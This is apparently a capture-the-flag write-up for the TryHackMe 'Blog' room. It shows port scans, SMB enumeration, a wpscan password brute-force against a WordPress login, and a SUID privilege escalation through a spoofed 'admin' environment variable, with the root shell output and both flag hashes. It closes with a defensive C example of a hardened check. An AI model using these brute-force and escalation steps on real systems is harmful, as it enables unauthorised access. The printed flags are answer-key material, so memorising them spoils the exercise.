Blog

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Blog
cd ~/Documents/TryHackMe/eJPT/Blog
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}

export IP=10.10.245.192
export URL=http://$IP

Enumeration

The room author recommends adding "blog.thm" to the /etc/hosts file so the machine can be reached by that hostname; do this before any web enumeration, since the site is addressed by that name rather than by IP.

To begin, scan all of the machine's ports with both rustscan and nmap. Running both tools cross-checks the results and gives a fuller picture of the exposed services and the attack surface they present.

  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
  • rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Before accessing the website, I try to get some information about shares using the enum4linux tool.

enum4linux $IP
smbclient -N //$IP/BillySMB

I downloaded three files, but they didn't contain useful information. Now, I'm moving on to check the website to see if there's anything there that could help.

We already found a user, so I use wpscan to brute-force this user's password. After minutes of waiting I got nothing, so I enumerated users instead and found another one -> kwheel

wpscan --url http://blog.thm/wp-login.php/ --passwords ~/Documents/rockyou.txt --usernames kwheel

Found the password for the kwheel user.

Exploitation

In the room description, there's a crucial clue pointing to a specific CVE that we need to leverage. This information is key to advancing in the challenge.

There are two ways to exploit this machine: a standalone script or the Metasploit framework.

I got access to the machine and, after a lot of enumeration, found a file with the SUID bit set -> /usr/sbin/checker

Let's download the file and employ reverse engineering tools and techniques to understand its functionality.

Examining the recovered code shows that the binary decides whether the caller is an admin from the environment variable "admin": set it to 0 before running the binary and it grants root privileges. Because the caller fully controls its own environment, this check is no barrier at all in a SUID program.

www-data@blog:/usr/sbin$ ./checker      
./checker
Not an Admin
www-data@blog:/usr/sbin$ export admin='0'
export admin='0'
www-data@blog:/usr/sbin$ ./checker
./checker
root@blog:/usr/sbin# whoami
whoami
root
root@blog:/usr/sbin# cd /media 
cd /media 
root@blog:/media# cd usb
cd usb
root@blog:/media/usb# ls
ls
user.txt
root@blog:/media/usb# cat user.txt
cat user.txt
c8421899aae571f7af486492b71a8ab7
root@blog:/media/usb# cd /root
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
root@blog:/root#
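The checker binary above is a textbook case of a setuid program trusting its environment. As an added illustration (not the room's binary, whose exact source is not reproduced here), the block below contrasts a hypothetical reconstruction of that flawed gate with a hardened gate that decides on the real UID, and adds the environment sanitisation a setuid program should perform before launching anything; the function names are mine.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Flawed gate: trusts an environment variable. Hypothetical reconstruction
 * of the logic the writeup describes, not the room's actual binary. The
 * caller owns its environment, so in a setuid program this is no barrier. */
int env_gate_grants_admin(void)
{
    return getenv("admin") != NULL;   /* NULL -> "Not an Admin" */
}

/* Hardened gate: decide on the real UID the kernel maintains for the
 * caller, which an unprivileged user cannot forge; ignore the environment. */
int uid_gate_grants_admin(uid_t real_uid)
{
    return real_uid == 0;
}

/* A setuid program that must run a subprocess should first discard the
 * inherited environment and set a fixed PATH, so neither "admin" nor a
 * poisoned PATH reaches the child. Returns 0 on success, -1 on error. */
int sanitize_env_for_setuid(void)
{
    char name[256];
    while (environ != NULL && environ[0] != NULL) {
        const char *eq = strchr(environ[0], '=');
        if (eq == NULL)                          /* malformed entry */
            return -1;
        size_t n = (size_t)(eq - environ[0]);
        if (n == 0 || n >= sizeof name)
            return -1;
        memcpy(name, environ[0], n);
        name[n] = '\0';
        if (unsetenv(name) != 0)                 /* removes environ[0] */
            return -1;
    }
    return setenv("PATH", "/usr/bin:/bin", 1);
}

int main(void)
{
    setenv("admin", "0", 1);   /* the same variable the writeup exports */
    printf("env gate: %s\n", env_gate_grants_admin() ? "admin" : "Not an Admin");
    printf("uid gate: %s\n", uid_gate_grants_admin(getuid()) ? "admin" : "Not an Admin");
    return sanitize_env_for_setuid() == 0 ? 0 : 1;
}
```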
